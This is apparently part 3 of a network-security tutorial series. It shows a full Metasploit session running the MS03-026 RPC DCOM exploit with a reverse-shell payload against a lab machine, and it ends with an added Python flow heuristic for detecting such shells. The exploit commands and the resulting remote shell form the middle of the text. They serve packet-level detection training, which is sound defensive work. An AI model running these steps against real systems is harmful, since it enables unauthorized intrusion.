If you would like to read the other articles in this series please check out:
- Packet analysis tools and methodology (Part 1)
- Packet analysis tools and methodology (Part 2)
- Packet analysis tools and methodology (Part 4)
On the offensive with Metasploit!
Over the previous two articles we have seen that there is a variety of port scans one can perform with some well-known tools, and we have covered some of the better-known programs that network security analysts use in an attempt to secure their networks. That brings us to a tool you may have read about before in one of my articles: the Metasploit Framework. Thanks to its many exploits, payloads and other advanced features, this tool is quickly gaining in popularity, and not only with security professionals but also with other elements of the computer world who do not have your best interests at heart.
Malicious hackers who have adopted this tool because of its relative ease of use and powerful features have a formidable weapon at their disposal. It should be evident to them, though, that each exploit in the framework comes with a ready-made intrusion detection signature. When the tool was designed, its creators, HDM and spoonm, were ethical enough to insert an ASCII signature that intrusion detection vendors could easily build a rule around, so the tool's traffic is readily detectable by an IDS. Several examples of this ASCII signature will be shown over the course of this article.
In the interest of better understanding how your networks could be compromised, we will attack a computer in my home lab. Various attacks will be shown, both successful and unsuccessful, along with the syntax used for one of them. Learning to use this tool is relatively easy. Remember, too, that there are only so many ways to compromise a computer. The great majority of them continue to revolve around application layer protocols such as HTTP and FTP, for the simple reason that these protocols must be reachable through the firewall in order to be used. It would be hard to target a protocol the operating system uses internally if it does not listen for inbound connections. In other words, you cannot really target something that is not listening.
Is anyone listening?
The examples that follow all target listening sockets: the services will be RPC, LSASS and HTTP. We will also run some exploits that will purposely fail because there is no service listening to be exploited, so that we can see what that looks like at the packet level. It is important to recognize not only a successful intrusion attempt but also an unsuccessful one. With that in mind, let's set up our first exploit in Metasploit. If you have read some of my earlier articles you will know that Metasploit can be used on either win32 or Linux. I will show the sequence of events used to configure Metasploit for the first exploit so that you need only repeat it for the remaining exploits. See below for detailed instructions on how to use the program.
don@linux:~/framework-2.2> ./msfconsole

((Metasploit Framework ASCII-art banner, v2.2))

+ -- --=[ msfconsole v2.2 [33 exploits - 33 payloads]

msf >
((Listed above is how you invoke the msfconsole within the framework directory))
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
  Credits                     Metasploit Framework Credits
  afp_loginext                AppleFileServer LoginExt PathName Buffer Overflow
  apache_chunked_win32        Apache Win32 Chunked Encoding
  blackice_pam_icq            ISS PAM.dll ICQ Parser Buffer Overflow
  distcc_exec                 DistCC Daemon Command Execution
  exchange2000_xexch50        Exchange 2000 MS03-46 Heap Overflow
  frontpage_fp30reg_chunked   Frontpage fp30reg.dll Chunked Encoding
  ia_webmail                  IA WebMail 3.x Buffer Overflow
  icecast_header              Icecast (<= 2.0.1) Header Overwrite (win32)
  iis50_nsiislog_post         IIS 5.0 nsiislog.dll POST Overflow
  iis50_printer_overflow      IIS 5.0 Printer Buffer Overflow
  iis50_webdav_ntdll          IIS 5.0 WebDAV ntdll.dll Overflow
((typing "show exploits" gives you the list of available exploits; this is only a partial list, as I have snipped out the bulk for brevity's sake))
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 >
((once you have decided which exploit to use you will type “use” followed by the actual exploit name as it appears just like the above noted example))
msf msrpc_dcom_ms03_026 > show options
Exploit Options
===============
  Exploit:    Name    Default   Description
  --------    ------  -------   ------------------
  required    RHOST             The target address
  required    RPORT   135       The target port

  Target: Windows NT SP6/2K/XP/2K3 ALL
msf msrpc_dcom_ms03_026 >
((typing "show options" lists the options this exploit needs. RHOST is the victim computer's IP address and RPORT the port it is attacked on, 135 here. LHOST is the address on your attacking computer that a reverse payload will connect back to; it is not the loopback address but your machine's own IP, which the victim must be able to reach. It is a payload option, so it only shows up once a payload has been selected, but it can be set now))
msf msrpc_dcom_ms03_026 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026 > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf msrpc_dcom_ms03_026 >
((you will now set the options as shown above))
msf msrpc_dcom_ms03_026 > show payloads
Metasploit Framework Usable Payloads
====================================
  win32_adduser               Windows Execute net user /ADD
  win32_bind                  Windows Bind Shell
  win32_bind_dllinject        Windows Bind DLL Inject
  win32_bind_stg              Windows Staged Bind Shell
  win32_bind_stg_upexec       Windows Staged Bind Upload/Execute
  win32_bind_vncinject        Windows Bind VNC Server DLL Inject
  win32_exec                  Windows Execute Command
  win32_reverse               Windows Reverse Shell
  win32_reverse_dllinject     Windows Reverse DLL Inject
  win32_reverse_stg           Windows Staged Reverse Shell
  win32_reverse_stg_ie        Windows Reverse InlineEgg Stager
  win32_reverse_stg_upexec    Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject     Windows Reverse VNC Server DLL Inject
((typing "show payloads" gives you an extensive list of payloads that can be attached to the exploit, and this is where Metasploit really shines above other such tools))
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) >
((once you have picked your payload type enter it as seen above))
msf msrpc_dcom_ms03_026(win32_reverse) > show options
Exploit and Payload Options
===========================
  Exploit:    Name      Default        Description
  --------    --------  -------------  ------------------
  required    RHOST     192.168.1.101  The target address
  required    RPORT     135            The target port

  Payload:    Name      Default        Description
  --------    --------  -------------  ------------------------------------------
  optional    EXITFUNC  seh            Exit technique: "process", "thread", "seh"
  required    LHOST     192.168.1.102  Local address to receive connection
  required    LPORT     4321           Local port to receive connection

  Target: Windows NT SP6/2K/XP/2K3 ALL
msf msrpc_dcom_ms03_026(win32_reverse) >
((when you type again “show options” you will see that they have all been filled in with the information required))
msf msrpc_dcom_ms03_026(win32_reverse) > set TARGET 0
TARGET -> 0
((the last thing I do is set the target field which encompasses pretty much all win32 operating systems as seen above))
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x80b3
[*] Got connection from 192.168.1.101:1028
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
((lastly, as seen above, I type "exploit" to launch the attack itself, and I do indeed get the reverse shell prompt. Note the direction of the last connection: the "Got connection from 192.168.1.101:1028" line is the victim connecting back to my handler on LPORT 4321, which is what a reverse payload does))
What this has shown us is that a tool as powerful as the Metasploit Framework is relatively easy to use. It is also genuinely helpful in letting us recognize what certain exploits look like at the packet level. I have said it before and I will say it again: you will always need to refer to the actual packets themselves to ascertain whether a system breach has occurred.
For that reason it helps a great deal if you can recognize an exploit for what it is, and there is no better way to learn that than to pull some off yourself in a lab environment. I have gone ahead and run several other exploits for the last part of this article series. In the next and last part, we will use some of the tools we visited earlier to investigate the binary log I will have generated for you: we will parse the binary log file through Snort and SnortSnarf, which will give us a friendly HTML file in which to investigate the Snort output. Till then!
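As an added illustration of that point, here is a small Python script that is not part of the original article. It looks for the two connection shapes the session above produces at the network level: an inbound hit on the RPC endpoint mapper (TCP/135) followed, within a short window, by a fresh connection between the same pair of hosts on a port that is not a normal service. A win32_reverse payload shows up as the victim calling back to the attacker (192.168.1.101:1028 to 192.168.1.102:4321 above); a win32_bind payload shows up as the attacker coming back to a new port on the victim. The flow log, its column layout, the 60-second window and the bind port 4444 are constructed assumptions, not capture data from the page.

```python
"""Flow-level heuristic for the RPC exploit plus shell pattern.

Added example (not from the article). The flow log, its column layout,
the 60-second window and the bind-shell port 4444 are constructed
assumptions chosen to mirror the session in the text.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one TCP SYN per line (not real capture data).
# Columns: timestamp  src_ip  src_port  dst_ip  dst_port
SAMPLE_FLOWS = """\
2005-03-01T10:00:00 192.168.1.50  3020 192.168.1.101 80
2005-03-01T10:00:01 192.168.1.102 1029 192.168.1.101 135
2005-03-01T10:00:02 192.168.1.101 1028 192.168.1.102 4321
2005-03-01T10:02:00 192.168.1.102 1031 192.168.1.103 135
2005-03-01T10:02:01 192.168.1.102 1032 192.168.1.103 4444
2005-03-01T10:05:00 192.168.1.102 1030 192.168.1.101 21
2005-03-01T10:05:30 192.168.1.101 1040 192.168.1.102 21
"""

RPC_PORTS = {135, 139, 445}        # endpoint mapper and the SMB paths to DCOM/LSASS
SERVICE_PORTS = {21, 22, 25, 53, 80, 110, 143, 443}  # ordinary destinations, ignored
WINDOW = timedelta(seconds=60)     # assumed: shell must follow the RPC hit within 60 s


def parse_flows(text):
    """Parse the constructed log into dicts with a real datetime and int ports."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append({"ts": datetime.fromisoformat(ts), "src": src,
                      "sport": int(sport), "dst": dst, "dport": int(dport)})
    return flows


def _within(later, earlier, window):
    """True when `later` happened at or after `earlier` and no more than `window` later."""
    delta = (later["ts"] - earlier["ts"]).total_seconds()
    return 0 <= delta <= window.total_seconds()


def find_shell_patterns(flows, window=WINDOW):
    """Return suspected reverse/bind shells as dicts, in time order.

    reverse: host A hits B on an RPC port, then B opens a connection to A.
    bind:    host A hits B on an RPC port, then A opens a new connection to B
             on a port that is not a normal service.
    """
    rpc_hits = defaultdict(list)   # victim ip -> SYNs it received on RPC ports
    findings = []
    for f in sorted(flows, key=lambda x: x["ts"]):
        if f["dport"] in RPC_PORTS:
            rpc_hits[f["dst"]].append(f)
            continue
        if f["dport"] in SERVICE_PORTS:
            continue
        for r in rpc_hits.get(f["src"], []):       # victim calling back out
            if r["src"] == f["dst"] and _within(f, r, window):
                findings.append({"kind": "reverse", "victim": f["src"],
                                 "attacker": f["dst"], "port": f["dport"],
                                 "rpc_port": r["dport"], "ts": f["ts"]})
        for r in rpc_hits.get(f["dst"], []):       # attacker coming back in
            if r["src"] == f["src"] and _within(f, r, window):
                findings.append({"kind": "bind", "victim": f["dst"],
                                 "attacker": f["src"], "port": f["dport"],
                                 "rpc_port": r["dport"], "ts": f["ts"]})
    return findings


if __name__ == "__main__":
    for hit in find_shell_patterns(parse_flows(SAMPLE_FLOWS)):
        print(f"{hit['ts']} {hit['kind']:7} victim={hit['victim']} "
              f"attacker={hit['attacker']} rpc={hit['rpc_port']} "
              f"shell_port={hit['port']}")
```

On the constructed log this flags the reverse shell to 192.168.1.102:4321 and a bind shell on 192.168.1.103:4444, and ignores the later FTP connections in both directions. It is a flow-level heuristic only: a legitimate DCOM client that later connects to the same host on a high port would trip the same rule, so, as the text says, confirming the breach still means looking at the packets themselves.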